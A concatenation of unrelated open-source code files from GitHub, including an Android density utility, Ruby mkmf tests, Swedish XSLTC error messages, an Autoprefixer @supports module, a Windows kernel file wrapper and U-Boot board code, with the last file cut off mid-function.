msgstr ""
#, c-format
msgid "%s: read manifest failed: %s\n"
msgstr "%s: lesing av manifest feilet: %s\n"
msgid "don't verify header+payload signature"
msgstr ""
#~ msgid "Failed to rename %s to %s: %m\n"
#~ msgstr "Feil under endring av navn fra %s til %s: %m\n"
| {
"pile_set_name": "Github"
} |
package tv.acfun.a63.util;
import tv.acfun.a63.AcApp;
import android.content.Context;
public class DensityUtil {
public static int dip2px(Context context, float dipValue) {
if(AcApp.density == 1f){
AcApp.density = context.getResources().getDisplayMetrics().density;
}
return (int) (dipValue * AcApp.density + 0.5f);
}
public static int px2dip(Context context, float pxValue) {
if(AcApp.density == 1f){
AcApp.density = context.getResources().getDisplayMetrics().density;
}
return (int) (pxValue / AcApp.density + 0.5f);
}
}
| {
"pile_set_name": "Github"
} |
require_relative 'base'
class TestMkmf
  class TestSignedness < TestMkmf
    # check_signedness should report -1 for signed integer types and +1 for
    # unsigned ones, across the built-in short/int/long variants.
    # bug4144 references the upstream report '[ruby-dev:42731]'.
    def test_typeof_builtin
      bug4144 = '[ruby-dev:42731]'
      [["", "-1"], ["signed ", "-1"], ["unsigned ", "+1"]].each do |prefix, expected|
        %w[short int long].each do |base|
          actual = mkmf { check_signedness(prefix + base) }
          assert_equal(expected.to_i, actual, mkmflog(bug4144))
        end
      end
    end

    # Same signedness probe routed through a typedef written to confdefs.h;
    # additionally checks that the SIGNEDNESS_OF_* define lands in $defs.
    def test_typeof_typedef
      [["", "-1"], ["signed ", "-1"], ["unsigned ", "+1"]].each do |prefix, expected|
        %w[short int long].each do |base|
          File.open("confdefs.h", "w") do |f|
            f.puts "typedef #{prefix}#{base} test1_t;"
          end
          $defs.clear
          assert_equal(expected.to_i, mkmf { check_signedness("test1_t", "confdefs.h") }, MKMFLOG)
          assert_include($defs, "-DSIGNEDNESS_OF_TEST1_T=#{expected}")
        end
      end
    ensure
      File.unlink("confdefs.h")
    end
  end
end
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: d26cf94ed562448e59249505a524cf93
timeCreated: 1482933200
licenseType: Pro
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.sun.org.apache.xalan.internal.xsltc.runtime;
import java.util.ListResourceBundle;
/**
 * Swedish ("sv") locale for the XSLTC run-time error messages; keys are
 * the constants declared in {@code BasisLibrary} and lookup happens via
 * the standard {@link ListResourceBundle} mechanism.
 *
 * @author Morten Jorgensen
 */
public class ErrorMessages_sv extends ListResourceBundle {

/*
 * XSLTC run-time error messages.
 *
 * General notes to translators and definitions:
 *
 *   1) XSLTC is the name of the product.  It is an acronym for XML Stylesheet:
 *      Transformations Compiler
 *
 *   2) A stylesheet is a description of how to transform an input XML document
 *      into a resultant output XML document (or HTML document or text)
 *
 *   3) An axis is a particular "dimension" in a tree representation of an XML
 *      document; the nodes in the tree are divided along different axes.
 *      Traversing the "child" axis, for instance, means that the program
 *      would visit each child of a particular node; traversing the "descendant"
 *      axis means that the program would visit the child nodes of a particular
 *      node, their children, and so on until the leaf nodes of the tree are
 *      reached.
 *
 *   4) An iterator is an object that traverses nodes in a tree along a
 *      particular axis, one at a time.
 *
 *   5) An element is a mark-up tag in an XML document; an attribute is a
 *      modifier on the tag.  For example, in <elem attr='val' attr2='val2'>
 *      "elem" is an element name, "attr" and "attr2" are attribute names with
 *      the values "val" and "val2", respectively.
 *
 *   6) A namespace declaration is a special attribute that is used to associate
 *      a prefix with a URI (the namespace).  The meanings of element names and
 *      attribute names that use that prefix are defined with respect to that
 *      namespace.
 *
 *   7) DOM is an acronym for Document Object Model.  It is a tree
 *      representation of an XML document.
 *
 *      SAX is an acronym for the Simple API for XML processing.  It is an API
 *      used inform an XML processor (in this case XSLTC) of the structure and
 *      content of an XML document.
 *
 *      Input to the stylesheet processor can come from an XML parser in the
 *      form of a DOM tree or through the SAX API.
 *
 *   8) DTD is a document type declaration.  It is a way of specifying the
 *      grammar for an XML file, the names and types of elements, attributes,
 *      etc.
 *
 *   9) Translet is an invented term that refers to the class file that contains
 *      the compiled form of a stylesheet.
 */

    // These message should be read from a locale-specific resource bundle
    /** Get the lookup table for error messages.
     *
     * @return The message lookup table.
     */
    public Object[][] getContents()
    {
        // Each row is {key, pattern}.  Note: apostrophes are doubled
        // ('') in the patterns — these strings appear to be processed by
        // java.text.MessageFormat, where a single quote opens a quoted
        // section and {0}/{1} are substitution slots (verify against
        // BasisLibrary's message formatting).
        return new Object[][] {

        /*
         * Note to translators:  the substitution text in the following message
         * is a class name.  Used for internal errors in the processor.
         */
        {BasisLibrary.RUN_TIME_INTERNAL_ERR,
        "Internt exekveringsfel i ''{0}''"},

        /*
         * Note to translators:  <xsl:copy> is a keyword that should not be
         * translated.
         */
        {BasisLibrary.RUN_TIME_COPY_ERR,
        "Exekveringsexekveringsfel av <xsl:copy>."},

        /*
         * Note to translators:  The substitution text refers to data types.
         * The message is displayed if a value in a particular context needs to
         * be converted to type {1}, but that's not possible for a value of type
         * {0}.
         */
        {BasisLibrary.DATA_CONVERSION_ERR,
        "Ogiltig konvertering fr\u00E5n ''{0}'' till ''{1}''."},

        /*
         * Note to translators:  This message is displayed if the function named
         * by the substitution text is not a function that is supported.  XSLTC
         * is the acronym naming the product.
         */
        {BasisLibrary.EXTERNAL_FUNC_ERR,
        "Den externa funktionen ''{0}'' underst\u00F6ds inte i XSLTC."},

        /*
         * Note to translators:  This message is displayed if two values are
         * compared for equality, but the data type of one of the values is
         * unknown.
         */
        {BasisLibrary.EQUALITY_EXPR_ERR,
        "Ok\u00E4nd argumenttyp i likhetsuttryck."},

        /*
         * Note to translators:  The substitution text for {0} will be a data
         * type; the substitution text for {1} will be the name of a function.
         * This is displayed if an argument of the particular data type is not
         * permitted for a call to this function.
         */
        {BasisLibrary.INVALID_ARGUMENT_ERR,
        "Argumenttyp ''{0}'' i anrop till ''{1}'' \u00E4r inte giltig"},

        /*
         * Note to translators:  There is way of specifying a format for a
         * number using a pattern; the processor was unable to format the
         * particular value using the specified pattern.
         */
        {BasisLibrary.FORMAT_NUMBER_ERR,
        "F\u00F6rs\u00F6ker formatera talet ''{0}'' med m\u00F6nstret ''{1}''."},

        /*
         * Note to translators:  The following represents an internal error
         * situation in XSLTC.  The processor was unable to create a copy of an
         * iterator.  (See definition of iterator above.)
         */
        {BasisLibrary.ITERATOR_CLONE_ERR,
        "Kan inte klona iteratorn ''{0}''."},

        /*
         * Note to translators:  The following represents an internal error
         * situation in XSLTC.  The processor attempted to create an iterator
         * for a particular axis (see definition above) that it does not
         * support.
         */
        {BasisLibrary.AXIS_SUPPORT_ERR,
        "Iteratorn f\u00F6r axeln ''{0}'' underst\u00F6ds inte."},

        /*
         * Note to translators:  The following represents an internal error
         * situation in XSLTC.  The processor attempted to create an iterator
         * for a particular axis (see definition above) that it does not
         * support.
         */
        {BasisLibrary.TYPED_AXIS_SUPPORT_ERR,
        "Iteratorn f\u00F6r den typade axeln ''{0}'' underst\u00F6ds inte."},

        /*
         * Note to translators: This message is reported if the stylesheet
         * being processed attempted to construct an XML document with an
         * attribute in a place other than on an element.  The substitution text
         * specifies the name of the attribute.
         */
        {BasisLibrary.STRAY_ATTRIBUTE_ERR,
        "Attributet ''{0}'' finns utanf\u00F6r elementet."},

        /*
         * Note to translators: As with the preceding message, a namespace
         * declaration has the form of an attribute and is only permitted to
         * appear on an element.  The substitution text {0} is the namespace
         * prefix and {1} is the URI that was being used in the erroneous
         * namespace declaration.
         */
        {BasisLibrary.STRAY_NAMESPACE_ERR,
        "Namnrymdsdeklarationen ''{0}''=''{1}'' finns utanf\u00F6r element."},

        /*
         * Note to translators:  The stylesheet contained a reference to a
         * namespace prefix that was undefined.  The value of the substitution
         * text is the name of the prefix.
         */
        {BasisLibrary.NAMESPACE_PREFIX_ERR,
        "Namnrymd f\u00F6r prefix ''{0}'' har inte deklarerats."},

        /*
         * Note to translators:  The following represents an internal error.
         * DOMAdapter is a Java class in XSLTC.
         */
        {BasisLibrary.DOM_ADAPTER_INIT_ERR,
        "DOMAdapter har skapats med fel typ av DOM-k\u00E4lla."},

        /*
         * Note to translators:  The following message indicates that the XML
         * parser that is providing input to XSLTC cannot be used because it
         * does not describe to XSLTC the structure of the input XML document's
         * DTD.
         */
        {BasisLibrary.PARSER_DTD_SUPPORT_ERR,
        "Den SAX-parser som du anv\u00E4nder hanterar inga DTD-deklarationsh\u00E4ndelser."},

        /*
         * Note to translators:  The following message indicates that the XML
         * parser that is providing input to XSLTC cannot be used because it
         * does not distinguish between ordinary XML attributes and namespace
         * declarations.
         */
        {BasisLibrary.NAMESPACES_SUPPORT_ERR,
        "Den SAX-parser som du anv\u00E4nder saknar st\u00F6d f\u00F6r XML-namnrymder."},

        /*
         * Note to translators:  The substitution text is the URI that was in
         * error.
         */
        {BasisLibrary.CANT_RESOLVE_RELATIVE_URI_ERR,
        "Kunde inte matcha URI-referensen ''{0}''."},

        /*
         * Note to translators:  The stylesheet contained an element that was
         * not recognized as part of the XSL syntax.  The substitution text
         * gives the element name.
         */
        {BasisLibrary.UNSUPPORTED_XSL_ERR,
        "XSL-elementet ''{0}'' st\u00F6ds inte"},

        /*
         * Note to translators:  The stylesheet referred to an extension to the
         * XSL syntax and indicated that it was defined by XSLTC, but XSLTC does
         * not recognize the particular extension named.  The substitution text
         * gives the extension name.
         */
        {BasisLibrary.UNSUPPORTED_EXT_ERR,
        "XSLTC-till\u00E4gget ''{0}'' \u00E4r ok\u00E4nt"},

        /*
         * Note to translators:  This error message is produced if the translet
         * class was compiled using a newer version of XSLTC and deployed for
         * execution with an older version of XSLTC.  The substitution text is
         * the name of the translet class.
         */
        {BasisLibrary.UNKNOWN_TRANSLET_VERSION_ERR,
        "Angiven translet, ''{0}'', har skapats med en XSLTC-version som \u00E4r senare \u00E4n den XSLTC-k\u00F6rning i bruk. F\u00F6r att kunna k\u00F6ra denna translet m\u00E5ste du omkompilera formatmallen eller anv\u00E4nda en senare version av XSLTC."},

        /*
         * Note to translators:  An attribute whose effective value is required
         * to be a "QName" had a value that was incorrect.
         * 'QName' is an XML syntactic term that must not be translated.  The
         * substitution text contains the actual value of the attribute.
         */
        {BasisLibrary.INVALID_QNAME_ERR,
        "Ett attribut vars v\u00E4rde m\u00E5ste vara ett QName hade v\u00E4rdet ''{0}''"},

        /*
         * Note to translators:  An attribute whose effective value is required
         * to be a "NCName" had a value that was incorrect.
         * 'NCName' is an XML syntactic term that must not be translated.  The
         * substitution text contains the actual value of the attribute.
         */
        {BasisLibrary.INVALID_NCNAME_ERR,
        "Ett attribut vars v\u00E4rde m\u00E5ste vara ett NCName hade v\u00E4rdet ''{0}''"},

        {BasisLibrary.UNALLOWED_EXTENSION_FUNCTION_ERR,
        "Anv\u00E4ndning av till\u00E4ggsfunktionen ''{0}'' \u00E4r inte till\u00E5tet n\u00E4r s\u00E4ker bearbetning till\u00E4mpas."},

        {BasisLibrary.UNALLOWED_EXTENSION_ELEMENT_ERR,
        "Anv\u00E4ndning av till\u00E4ggselementet ''{0}'' \u00E4r inte till\u00E5tet n\u00E4r s\u00E4ker bearbetning till\u00E4mpas."},
    };
    }

}
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import "NSObject-Protocol.h"
@class NSDraggingSession;
/// Class-dump reconstruction of AppKit's NSDraggingSource protocol:
/// adopted by the object that initiated a drag-and-drop session.
@protocol NSDraggingSource <NSObject>
/// Required: returns the mask of drag operations the source permits for
/// the given dragging context (presumably within/outside the app —
/// NOTE(review): confirm against the AppKit headers).
- (unsigned long long)draggingSession:(NSDraggingSession *)arg1 sourceOperationMaskForDraggingContext:(long long)arg2;

@optional
/// When YES, modifier keys do not alter the operation mask for this session.
- (BOOL)ignoreModifierKeysForDraggingSession:(NSDraggingSession *)arg1;
/// Session lifecycle callbacks: drag ended, pointer moved, drag began.
- (void)draggingSession:(NSDraggingSession *)arg1 endedAtPoint:(struct CGPoint)arg2 operation:(unsigned long long)arg3;
- (void)draggingSession:(NSDraggingSession *)arg1 movedToPoint:(struct CGPoint)arg2;
- (void)draggingSession:(NSDraggingSession *)arg1 willBeginAtPoint:(struct CGPoint)arg2;
@end
| {
"pile_set_name": "Github"
} |
/*
* Use of this source code is governed by the MIT license that can be
* found in the LICENSE file.
*/
package org.rust.lang
import com.intellij.openapi.fileTypes.LanguageFileType
import com.intellij.openapi.vfs.VirtualFile
import org.rust.ide.icons.RsIcons
import javax.swing.Icon
/**
 * Registers `.rs` sources as the Rust [LanguageFileType] in the IDE.
 * Rust files are always decoded as UTF-8, regardless of detected charset.
 */
object RsFileType : LanguageFileType(RsLanguage) {
    override fun getName(): String {
        return "Rust"
    }

    override fun getDescription(): String {
        return "Rust Files"
    }

    override fun getDefaultExtension(): String {
        return "rs"
    }

    override fun getIcon(): Icon {
        return RsIcons.RUST_FILE
    }

    override fun getCharset(file: VirtualFile, content: ByteArray): String {
        return "UTF-8"
    }
}
| {
"pile_set_name": "Github"
} |
// Compiled from CoffeeScript (Autoprefixer). Rewrites the parameters of
// @supports at-rules: adds vendor-prefixed declarations for properties/
// values that need them and strips outdated prefixed ones.
(function() {
  var Browsers, Supports, Value, brackets, browser, data, postcss, ref, support, supported, utils, version, versions;

  Browsers = require('./browsers');

  brackets = require('./brackets');

  Value = require('./value');

  utils = require('./utils');

  postcss = require('postcss');

  // "browser version" strings that understand @supports at all, taken
  // from the caniuse css-featurequeries data ("y" in the stat string).
  supported = [];

  data = require('caniuse-db/features-json/css-featurequeries.json');

  ref = data.stats;
  for (browser in ref) {
    versions = ref[browser];
    for (version in versions) {
      support = versions[version];
      if (/y/.test(support)) {
        supported.push(browser + ' ' + version);
      }
    }
  }

  Supports = (function() {
    // Keeps the Prefixes class and the shared "all" prefixes instance.
    function Supports(Prefixes, all1) {
      this.Prefixes = Prefixes;
      this.all = all1;
    }

    // Lazily builds (and caches) a Prefixes instance restricted to the
    // selected browsers that support @supports — prefixes for other
    // browsers would never be evaluated inside the condition anyway.
    Supports.prototype.prefixer = function() {
      var browsers, filtered;
      if (this.prefixerCache) {
        return this.prefixerCache;
      }
      filtered = this.all.browsers.selected.filter((function(_this) {
        return function(i) {
          return supported.indexOf(i) !== -1;
        };
      })(this));
      browsers = new Browsers(this.all.browsers.data, filtered, this.all.options);
      return this.prefixerCache = new this.Prefixes(this.all.data, browsers, this.all.options);
    };

    // Splits a "prop: value" string into a trimmed [prop, value] pair.
    Supports.prototype.parse = function(str) {
      var prop, ref1, value;
      ref1 = str.split(':'), prop = ref1[0], value = ref1[1];
      value || (value = '');
      return [prop.trim(), value.trim()];
    };

    // Wraps a "prop: value" string in a throwaway PostCSS rule so the
    // normal declaration-level prefixers can process it.
    Supports.prototype.virtual = function(str) {
      var prop, ref1, rule, value;
      ref1 = this.parse(str), prop = ref1[0], value = ref1[1];
      rule = postcss.parse('a{}').first;
      rule.append({
        prop: prop,
        value: value,
        raws: {
          before: ''
        }
      });
      return rule;
    };

    // Returns the declaration plus all prefixed variants produced by the
    // property- and value-level prefixers for the given "prop: value".
    Supports.prototype.prefixed = function(str) {
      var decl, j, k, len, len1, prefixer, prop, ref1, ref2, rule, value;
      rule = this.virtual(str);
      prop = rule.first.prop;
      prefixer = this.prefixer().add[prop];
      if (prefixer != null) {
        if (typeof prefixer.process === "function") {
          prefixer.process(rule.first);
        }
      }
      ref1 = rule.nodes;
      for (j = 0, len = ref1.length; j < len; j++) {
        decl = ref1[j];
        ref2 = this.prefixer().values('add', prop);
        for (k = 0, len1 = ref2.length; k < len1; k++) {
          value = ref2[k];
          value.process(decl);
        }
        Value.save(this.all, decl);
      }
      return rule.nodes;
    };

    // Node-type predicates over the parsed brackets AST: a "not" token,
    // an "or" token, and a single "prop: value" leaf.
    Supports.prototype.isNot = function(node) {
      return typeof node === 'string' && /not\s*/i.test(node);
    };

    Supports.prototype.isOr = function(node) {
      return typeof node === 'string' && /\s*or\s*/i.test(node);
    };

    Supports.prototype.isProp = function(node) {
      return typeof node === 'object' && node.length === 1 && typeof node[0] === 'string';
    };

    // True when the unprefixed property does NOT also appear in the full
    // condition — i.e. the prefixed entry is a browser hack, not a
    // prefixed copy Autoprefixer should manage.
    Supports.prototype.isHack = function(all, unprefixed) {
      var check;
      check = new RegExp('(\\(|\\s)' + utils.escapeRegexp(unprefixed) + ':');
      return !check.test(all);
    };

    // Should this "prop: value" entry be dropped from the condition?
    // (outdated prefixed property or prefixed value, per the cleaner.)
    Supports.prototype.toRemove = function(str, all) {
      var checker, j, len, prop, ref1, ref2, ref3, unprefixed, value;
      ref1 = this.parse(str), prop = ref1[0], value = ref1[1];
      unprefixed = this.all.unprefixed(prop);
      if (((ref2 = this.all.cleaner().remove[prop]) != null ? ref2.remove : void 0) && !this.isHack(all, unprefixed)) {
        return true;
      }
      ref3 = this.all.cleaner().values('remove', unprefixed);
      for (j = 0, len = ref3.length; j < len; j++) {
        checker = ref3[j];
        if (checker.check(value)) {
          return true;
        }
      }
      return false;
    };

    // Removes outdated "prop or"-pairs from the AST in place, skipping
    // entries preceded by "not"; recurses into nested brackets.
    Supports.prototype.remove = function(nodes, all) {
      var i;
      i = 0;
      while (i < nodes.length) {
        if (!this.isNot(nodes[i - 1]) && this.isProp(nodes[i]) && this.isOr(nodes[i + 1])) {
          if (this.toRemove(nodes[i][0], all)) {
            nodes.splice(i, 2);
          } else {
            i += 2;
          }
        } else {
          if (typeof nodes[i] === 'object') {
            nodes[i] = this.remove(nodes[i], all);
          }
          i += 1;
        }
      }
      return nodes;
    };

    // Collapses redundant single-child bracket nesting.
    Supports.prototype.cleanBrackets = function(nodes) {
      return nodes.map((function(_this) {
        return function(i) {
          if (typeof i === 'object') {
            if (i.length === 1 && typeof i[0] === 'object') {
              return _this.cleanBrackets(i[0]);
            } else {
              return _this.cleanBrackets(i);
            }
          } else {
            return i;
          }
        };
      })(this));
    };

    // Turns a list of prefixed declarations into the bracket-AST form
    // "(d1) or (d2) or ..." used inside the condition.
    Supports.prototype.convert = function(progress) {
      var i, j, len, result;
      result = [''];
      for (j = 0, len = progress.length; j < len; j++) {
        i = progress[j];
        result.push([i.prop + ": " + i.value]);
        result.push(' or ');
      }
      result[result.length - 1] = '';
      return result;
    };

    // Normalizes the raw brackets parse: drops empty tokens and
    // re-stringifies nested brackets that are really one declaration.
    Supports.prototype.normalize = function(nodes) {
      if (typeof nodes === 'object') {
        nodes = nodes.filter(function(i) {
          return i !== '';
        });
        if (typeof nodes[0] === 'string' && nodes[0].indexOf(':') !== -1) {
          return [brackets.stringify(nodes)];
        } else {
          return nodes.map((function(_this) {
            return function(i) {
              return _this.normalize(i);
            };
          })(this));
        }
      } else {
        return nodes;
      }
    };

    // Replaces each declaration leaf that gains prefixes with an
    // "(original) or (prefixed) ..." group; recurses into brackets.
    Supports.prototype.add = function(nodes, all) {
      return nodes.map((function(_this) {
        return function(i) {
          var prefixed;
          if (_this.isProp(i)) {
            prefixed = _this.prefixed(i[0]);
            if (prefixed.length > 1) {
              return _this.convert(prefixed);
            } else {
              return i;
            }
          } else if (typeof i === 'object') {
            return _this.add(i, all);
          } else {
            return i;
          }
        };
      })(this));
    };

    // Entry point: parse the @supports params, remove outdated entries,
    // add needed prefixes, tidy the brackets, and write the result back.
    Supports.prototype.process = function(rule) {
      var ast;
      ast = brackets.parse(rule.params);
      ast = this.normalize(ast);
      ast = this.remove(ast, rule.params);
      ast = this.add(ast, rule.params);
      ast = this.cleanBrackets(ast);
      return rule.params = brackets.stringify(ast);
    };

    return Supports;

  })();

  module.exports = Supports;

}).call(this);
| {
"pile_set_name": "Github"
} |
#
# CHAR column types
#
# Engine-agnostic MTR wrapper: skip unless the engine under test is
# available, run the shared CHAR column-type checks, then clean up.
--source have_engine.inc

--source type_char.inc

--source cleanup_engine.inc
| {
"pile_set_name": "Github"
} |
#include <fltKernel.h>
#include "FilesAPI.h"
// Opens (or creates) a file from kernel mode and stores the handle in
// hFile; the result of ZwCreateFile is kept in CreationStatus.
// FilePath must be a native NT path (e.g. L"\\??\\C:\\x" —
// NOTE(review): confirm expected path form against callers).
// The handle is a kernel handle, case-insensitive, opened for
// synchronous non-alertable I/O on a non-directory file.
FilesAPI::FilesAPI(
    LPCWSTR FilePath,
    CREATE_FILE_TYPE Type,
    ACCESS_MASK AccessMask,
    ULONG ShareAccess
) : hFile(NULL) {
    UNICODE_STRING Path;
    RtlInitUnicodeString(&Path, FilePath);

    OBJECT_ATTRIBUTES ObjectAttributes;
    InitializeObjectAttributes(
        &ObjectAttributes,
        &Path,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
        NULL,
        NULL
    );

    IO_STATUS_BLOCK IoStatusBlock = {};
    LARGE_INTEGER AllocationSize = {};

    // Map the requested open mode to an NT create disposition.
    // FILE_OVERWRITE is only the fallback for an out-of-range Type;
    // every enumerator below selects its own disposition.
    ULONG CreateDisposition = FILE_OVERWRITE;
    switch (Type) {
    case fCreateEmpty:
        CreateDisposition = FILE_OVERWRITE_IF; // create new or truncate existing
        break;
    case fOpenExisting:
        CreateDisposition = FILE_OPEN;         // fail if absent
        break;
    case fOpenOrCreate:
        CreateDisposition = FILE_OPEN_IF;      // open, create if necessary
        break;
    }

    CreationStatus = ZwCreateFile(
        &hFile,
        AccessMask,
        &ObjectAttributes,
        &IoStatusBlock,
        &AllocationSize,
        FILE_ATTRIBUTE_NORMAL,
        ShareAccess,
        CreateDisposition,
        FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
        NULL,
        0
    );
}
// Synchronously reads Size bytes into Buffer, starting at byte Offset
// from the beginning of the file.  Returns the ZwReadFile status.
NTSTATUS FilesAPI::Read(OUT PVOID Buffer, ULONG Size, OPTIONAL UINT64 Offset) const {
    IO_STATUS_BLOCK IoStatusBlock = {};
    LARGE_INTEGER ByteOffset;
    ByteOffset.QuadPart = static_cast<LONGLONG>(Offset);
    return ZwReadFile(hFile, NULL, NULL, NULL, &IoStatusBlock, Buffer, Size, &ByteOffset, NULL);
}
// Synchronously writes Size bytes from Buffer at byte Offset from the
// beginning of the file.  Returns the ZwWriteFile status.
NTSTATUS FilesAPI::Write(IN PVOID Buffer, ULONG Size, OPTIONAL UINT64 Offset) const {
    IO_STATUS_BLOCK IoStatusBlock = {};
    LARGE_INTEGER ByteOffset;
    ByteOffset.QuadPart = static_cast<LONGLONG>(Offset);
    return ZwWriteFile(hFile, NULL, NULL, NULL, &IoStatusBlock, Buffer, Size, &ByteOffset, NULL);
}
// Closes the underlying handle (if any) and resets it to NULL so a
// second Close() is a harmless no-op.  Returns STATUS_SUCCESS when
// there was nothing to close.
NTSTATUS FilesAPI::Close() {
    if (hFile == NULL) {
        return STATUS_SUCCESS;
    }
    NTSTATUS Status = ZwClose(hFile);
    hFile = NULL;
    return Status;
}
// Creates a directory at the given NT path.  FILE_CREATE makes the call
// fail if the directory already exists (STATUS_OBJECT_NAME_COLLISION).
// The transient handle is opened with SYNCHRONIZE only, non-shared, and
// closed before returning.  Returns the ZwCreateFile status.
NTSTATUS FilesAPI::CreateDir(LPCWSTR DirPath) {
    UNICODE_STRING Path;
    RtlInitUnicodeString(&Path, DirPath);

    OBJECT_ATTRIBUTES ObjectAttributes;
    InitializeObjectAttributes(
        &ObjectAttributes,
        &Path,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
        NULL,
        NULL
    );

    IO_STATUS_BLOCK IoStatusBlock = {};
    LARGE_INTEGER AllocationSize = {};
    HANDLE hDir = NULL;
    NTSTATUS Status = ZwCreateFile(
        &hDir,
        SYNCHRONIZE,
        &ObjectAttributes,
        &IoStatusBlock,
        &AllocationSize,
        FILE_ATTRIBUTE_NORMAL,
        0, // Non-shared access
        FILE_CREATE,
        FILE_DIRECTORY_FILE,
        NULL,
        0
    );
    if (NT_SUCCESS(Status) && hDir) ZwClose(hDir);
    return Status;
}
// Deletes the file at the given NT path via ZwDeleteFile and returns
// its status.  NOTE(review): unlike the constructor/CreateDir, the
// attributes here omit OBJ_KERNEL_HANDLE (no handle is created, so it
// is likely irrelevant) — confirm the asymmetry is intentional.
NTSTATUS FilesAPI::DeleteFile(LPCWSTR FilePath) {
    UNICODE_STRING Path;
    RtlInitUnicodeString(&Path, FilePath);

    OBJECT_ATTRIBUTES ObjectAttributes;
    InitializeObjectAttributes(
        &ObjectAttributes,
        &Path,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL
    );

    return ZwDeleteFile(&ObjectAttributes);
} | {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* (C) Copyright 2008
* Sergei Poselenov, Emcraft Systems, [email protected].
*
* Copyright 2004 Freescale Semiconductor.
* (C) Copyright 2002,2003, Motorola Inc.
* Xianghua Xiao, ([email protected])
*
* (C) Copyright 2002 Scott McNutt <[email protected]>
*/
#include <common.h>
#include <pci.h>
#include <asm/processor.h>
#include <asm/immap_85xx.h>
#include <ioports.h>
#include <flash.h>
#include <linux/libfdt.h>
#include <fdt_support.h>
#include <asm/io.h>
#include <i2c.h>
#include <mb862xx.h>
#include <video_fb.h>
#include "upm_table.h"
DECLARE_GLOBAL_DATA_PTR;
extern flash_info_t flash_info[]; /* FLASH chips info */
extern GraphicDevice mb862xx;
void local_bus_init (void);
ulong flash_get_size (ulong base, int banknum);
/*
 * checkboard() - identify the board during early boot.
 *
 * Prints the board name plus the "serial#" environment value (if set),
 * reports how PCI1 is clocked (SYSCLK vs. PCI_CLK, selected by the
 * PCI_clk bit in PORPLLSR), then initializes the local bus.
 *
 * Fix: gur, src and f are only used when CONFIG_PCI is enabled, so they
 * are now declared inside the #ifdef — the original declared gur and f
 * unconditionally, producing unused-variable warnings on !CONFIG_PCI
 * builds.
 *
 * Always returns 0.
 */
int checkboard (void)
{
#ifdef CONFIG_PCI
	volatile ccsr_gur_t *gur = (void *)(CONFIG_SYS_MPC85xx_GUTS_ADDR);
	char *src;
	int f;
#endif
	char buf[64];
	int i = env_get_f("serial#", buf, sizeof(buf));

	puts("Board: Socrates");
	if (i > 0) {
		puts(", serial# ");
		puts(buf);
	}
	putc('\n');

#ifdef CONFIG_PCI
	/* Check the PCI_clk sel bit */
	if (in_be32(&gur->porpllsr) & (1<<15)) {
		src = "SYSCLK";
		f = CONFIG_SYS_CLK_FREQ;
	} else {
		src = "PCI_CLK";
		f = CONFIG_PCI_CLK_FREQ;
	}
	printf ("PCI1: 32 bit, %d MHz (%s)\n", f/1000000, src);
#else
	printf ("PCI1: disabled\n");
#endif

	/*
	 * Initialize local bus.
	 */
	local_bus_init ();

	return 0;
}
/*
 * misc_init_r() - late init: adapt FLASH mapping and protection to the
 * size actually detected.
 *
 * Places the boot FLASH so it ends at the top of the address space.  If
 * the detected bank is smaller than the maximum CS0 window, BR0/OR0 are
 * re-programmed and the bank is re-probed at the new base.  If the
 * second bank is absent, CS1 is disabled and the monitor, environment
 * and redundant-environment sectors are re-protected at the adjusted
 * addresses.  Always returns 0.
 */
int misc_init_r (void)
{
	/*
	 * Adjust flash start and offset to detected values
	 */
	gd->bd->bi_flashstart = 0 - gd->bd->bi_flashsize;
	gd->bd->bi_flashoffset = 0;

	/*
	 * Check if boot FLASH isn't max size
	 */
	if (gd->bd->bi_flashsize < (0 - CONFIG_SYS_FLASH0)) {
		set_lbc_or(0, gd->bd->bi_flashstart |
			   (CONFIG_SYS_OR0_PRELIM & 0x00007fff));
		set_lbc_br(0, gd->bd->bi_flashstart |
			   (CONFIG_SYS_BR0_PRELIM & 0x00007fff));

		/*
		 * Re-check to get correct base address
		 */
		flash_get_size(gd->bd->bi_flashstart, CONFIG_SYS_MAX_FLASH_BANKS - 1);
	}

	/*
	 * Check if only one FLASH bank is available
	 */
	if (gd->bd->bi_flashsize != CONFIG_SYS_MAX_FLASH_BANKS * (0 - CONFIG_SYS_FLASH0)) {
		set_lbc_or(1, 0);
		set_lbc_br(1, 0);

		/*
		 * Re-do flash protection upon new addresses
		 */
		flash_protect (FLAG_PROTECT_CLEAR,
			       gd->bd->bi_flashstart, 0xffffffff,
			       &flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);

		/* Monitor protection ON by default */
		flash_protect (FLAG_PROTECT_SET,
			       CONFIG_SYS_MONITOR_BASE, CONFIG_SYS_MONITOR_BASE + monitor_flash_len - 1,
			       &flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);

		/* Environment protection ON by default */
		flash_protect (FLAG_PROTECT_SET,
			       CONFIG_ENV_ADDR,
			       CONFIG_ENV_ADDR + CONFIG_ENV_SECT_SIZE - 1,
			       &flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);

		/* Redundant environment protection ON by default */
		flash_protect (FLAG_PROTECT_SET,
			       CONFIG_ENV_ADDR_REDUND,
			       CONFIG_ENV_ADDR_REDUND + CONFIG_ENV_SECT_SIZE - 1,
